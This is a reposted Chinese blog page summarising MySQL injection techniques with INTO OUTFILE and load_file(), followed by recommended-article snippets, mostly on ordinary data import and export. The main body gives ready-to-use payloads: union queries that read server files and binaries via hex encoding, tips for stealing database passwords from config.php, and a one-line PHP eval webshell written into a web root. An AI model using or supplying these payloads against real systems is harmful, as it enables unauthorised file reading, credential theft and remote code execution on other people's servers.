mysql注入 outfile_<转>Mysql注入中into outfile和load_file()总结

最新推荐文章于 2021-02-07 08:43:35 发布
最新推荐文章于 2021-02-07 08:43:35 发布
阅读量257 收藏
点赞数
文章标签: mysql注入 outfile
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39705435/article/details/113215780
版权

(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。

唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。

(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径中的斜杠是/而不是\。

一般用load_file来看config.php(即mysql的密码),apache配置、servu密码等。前提是要知道物理路径。

(3)load_file可以在union中作为一个字段来用。如union select 1,load_file('c:/boot.ini'),3,4 from ka_admin等。

(4)load_file可以在where字句中使用。如 and length(load_file(0x633A2F626F6F742E696E69))>1

(5)load_file文件的时候,特别是想看exe等含有二进制的00等截断或者回车 换行等特殊符号时,可以结合hex函数。如union select 1,hex(load_file('c:/windows/notepad.exe')),3 from xxxx,这样就不会存在截断了,也不会一会断行而截断。自己再用个工具或者几行代码转换回来就是了。

(6)outfile一句话(经典):select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

或者从表中

select * from a into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

(7)关于mysql多语句:直接在mysql中,可以同时select中使用update或者insert,但是php注入中就不行,至少我测试的是php的函数mysql_query是不行。

weixin_39705435
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql注入的outfile、dumpfileload_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档的描述如下 翻译一下就是 其当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
mysql注入 outfile_Mysql注入的outfile、dumpfileload_file函数详解
weixin_42297439的博客
01-19 505
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其比较常用的函数有以下三个into dumpfile()into outfile()load_file()我们本次的测试数据如下读写文件函数调用的限制因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档的描述如下翻译一下...
MySQL INTO OUTFILE导出导入数据|mysqldump
u013358378的专栏
11-29 1003
--将刚刚导出的文件log1.txt导入到表log1相同结构的LOG2 点击(此处)折叠或打开 LOAD DATA INFILE 'C:\\log1.txt' INTO TABLE
mysql outfile 远程_mysql从远程数据库储到localhost outfile
weixin_29693211的博客
01-19 364
I'm stuck. I basically want to create a LOCAL data file (csv file) from a remote database using the OUTFILE command.I am basically, pulling data.. and want to create it on my local file server vs. cre...
mysql infile outfile_mysqloutfileinfile导入导出数据_MySQL
weixin_34247778的博客
02-07 114
bitsCN.commysql outfile infile导入导出数据导出[plain]SELECT * INTO OUTFILE '/tmp/jason.txt' FIELDS TERMINATED BY ',' FROM test.jason;或者[plain]SELECT * INTO OUTFILE '/tmp/jason1.txt' FIELDS TERMINATED BY ',' O...
mysql.rar_MYSQL数据库开发、管理和维护。_mysql学习资料
09-24
3. 数据库导入导出:掌握使用LOAD DATA INFILE和SELECT ... INTO OUTFILE命令进行数据导入导出的方法。 4. 日志管理:了解错误日志、二进制日志和慢查询日志的作用,以及如何调整相关配置。 三、MySQL数据库维护 ...
mysql Load Data InFile 的用法
09-11
`LOAD DATA INFILE` 是 MySQL 数据库一种高效的数据导入工具,它允许用户从外部文本文件快速批量导入数据到数据库的表。相比于使用 `INSERT INTO` 语句逐条插入,`LOAD DATA INFILE` 在处理大量数据时速度显著更...
MySQL注入绕开过滤的技巧总结
09-09
- `LOAD_FILE()`和`INTO OUTFILE`是两个经常在SQL注入使用的函数,它们允许读取或写入文件。通过将恶意数据编码为十六进制并使用这些函数,攻击者可以绕过过滤并执行文件操作。 5. **理解过滤规则**: - 成功绕...
Sqlilabs Less 7 Dump to outfile
baynk的博客
02-22 412
看到这个outfile就知道肯定是直接写webshell了,原来都是在phpmyadmin写的,现在用在网页写,而且路径啥的都不知道,估计要作弊了。。。 Less 7 GET-Dump into outfile-String 手工注入 先用普通手法试试,发现正常显示只有一句 You are in.... Use outfile......,构造错误语句的又没有提示哪错了。这种时候一般使用盲注比...
简易版 文件上传UpdateFile(Struts2版)
奔跑在路上
05-13 591
1.搭建环境 eclipase:Luna Release (4.4.0) struts2 :2.3.28  下载地址:http://download.csdn.net/detail/chuck_kui/9513090 2. 项目结构: 3. 类: Update.java package com.baidu.update; import java.io.File;
mysql查询表的列名
Lamking 、 Blog
04-22 1643
select column_name from information_schema.COLUMNS where table_name='表名'; 引用:information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
关于MYSQL into outfile注射
Quantum Intelligence
01-03 2057
其实网上已经有很多关于MYSQL注射的文章了~ 不过还是缺乏重点吧~ 要使用  into outfile 把代码写到web目录取得WEBSHELL  首先需要 3大先天条件①知道物理路径(into outfile 物理路径) 这样才能写对目录②能够使用union (也就是说需要MYSQL3以上的版本)③对方没有对’进行过滤(因为outfile 后面的 不可以用其他函数代替
mysql into outfile语法_用SELECT... INTO OUTFILE语句导出MySQL数据
weixin_33168937的博客
01-19 1707
表数据导出到一个文本文件最简单的方法是使用SELECT... INTO OUTFILE语句的查询结果直接导出到一个文件在服务器主机上。导出数据的SELECT...INTO OUTFILE声明:这句话的语法结合了常规的SELECT INTO OUTFILE文件名的末尾。默认的输出格式是相同的LOAD DATA,所以下面的语句导出tutorials_tbl的表制表符分隔的,换行结尾的文件到/tmp/t...
mysql学习十三之insert插入操作详解,replace的用法,load data infile导入数据源的用法
公子&小白的博客
01-22 1991
一、insert插入操作的基本用法 insert into tbl_name (字段列表) values(值列表); 1、如果说需要完成部分字段的插入,需要必须存在字段列表。即: insert into tbl_name(需要插入的字段列表) values (值列表); 注意:对于没有插入的字段使用默认值。 2、如果插入的是部分字段,也可以使用set语法。 即: 3、值列表语...
mysql infile/outfile 导入导出
写博客只为学习
04-11 1902
第一种方式:通过SELECT 语句以及 LOAD FILE来导出导入文本文件 这种方式不会引起行锁定。 命令: SELECT * INTO OUTFILE 'D:/sql/test.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' ESCAPED BY '"' FROM test; 说明: --
mysql into outfile语法_select into outfile导出数据sql语句
weixin_39851914的博客
02-01 853
select into outfile命令是mysql一种用来导出数据的一个常用的命令,下面我来介绍select into outfile的用法,有需要的朋友可参考。mysql管理数据当然可以很方便的导出数据,但是当数据量很大是,phpmyadmin很可能会发生执行超时,其实很容易用select into outfile解决!SELECT...INTO OUTFILE语句的主要作用是让您可以非常...
MySQL使用 INTO INFILE/OUTFILE导入导出数据
小猪佩奇工作室
01-23 1628
1.使用SELECT ... INTO OUTFILE 以逗号分隔的方式将数据导入到一个csv文件: SELECT * FROM table1 INTO OUTFILE 'usr/data/data1.csv' FIELDS TERMINATED BY ',' 2.将刚刚导出的文件data1.csv导入到表table1相同结构的table2: LOAD DATA INFILE 'usr
mysql修改secure_file_priv
最新发布
05-26
secure_file_priv是MySQL的一个系统变量,用于限制LOAD DATA INFILE和SELECT ... INTO OUTFILE操作的文件读写权限。如果未设置secure_file_priv,则默认情况下,这些操作将被允许在任何目录读取和写入文件。 要修改secure_file_priv,您可以按照以下步骤进行操作: 1.登录MySQL服务器并以管理员身份运行以下命令: ``` mysql -u root -p ``` 2.执行以下命令以查看当前的secure_file_priv设置: ``` SHOW VARIABLES LIKE 'secure_file_priv'; ``` 3.使用以下命令来更改secure_file_priv的值: ``` SET GLOBAL secure_file_priv='/new/path'; ``` 4.重启MySQL服务以使更改生效。 注意:在更改secure_file_priv之前,请确保指定的路径存在且有适当的权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值